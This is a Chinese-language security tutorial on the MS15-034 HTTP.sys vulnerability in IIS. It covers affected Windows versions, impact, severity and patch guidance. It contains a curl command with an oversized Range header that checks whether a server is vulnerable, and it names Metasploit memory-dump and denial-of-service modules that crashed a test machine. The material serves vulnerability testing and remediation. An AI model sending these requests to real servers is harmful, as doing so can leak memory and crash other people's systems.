网络安全进阶篇（十二章-2）HTTP.SYS远程代码执行漏洞(MS15-034)

1.简介

漏洞编号：CVE-2015-1635（MS15-034 ）

远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中，
当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 
成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。

2.影响范围

任何安装了微软IIS 6.0以上的
	Win Server 2008 R2、 
	Win Server 2012、
	Win Server 2012 R2、
	Win 7、
	Win 8、
	Win 8.1

3.造成危害

（1）远程读取IIS服务器的内存数据，
	
（2）使服务器系统蓝屏崩溃。

4.漏洞验证

（1）通过curl命令实现

	curl -v IP -H "Host:irrelevant" -H "Range: bytes=0-18446744073709551615"

	用的时候仅仅修改IP就行；这个IP可以是：纯IP、IP加端口号、域名。

如果服务器存在HTTP.SYS远程代码执行漏洞，那么响应状态应该有：

HTTP/1.1 416 Requested Range Not Satisfiable

如果服务器打上了补丁，那么响应状态应该是：

HTTP Error 400. The request has an invalid header name.

（2）利用MSF

利用此模块：auxiliary/scanner/http/ms15_034_http_sys_memory_dump    

利用此模块：auxiliary/dos/http/ms15_034_ulonglongadd 

在攻击开始之后，win7靶机瞬间蓝屏，然后自动重启

5.危害等级

一般在项目中定级为高，重测之中看环境可能为中。

6.修复建议

（1）临时办法

	禁用IIS内核缓存

（2）官方补丁

	官方补丁下载：https://support.microsoft.com/zh-cn/kb/3042553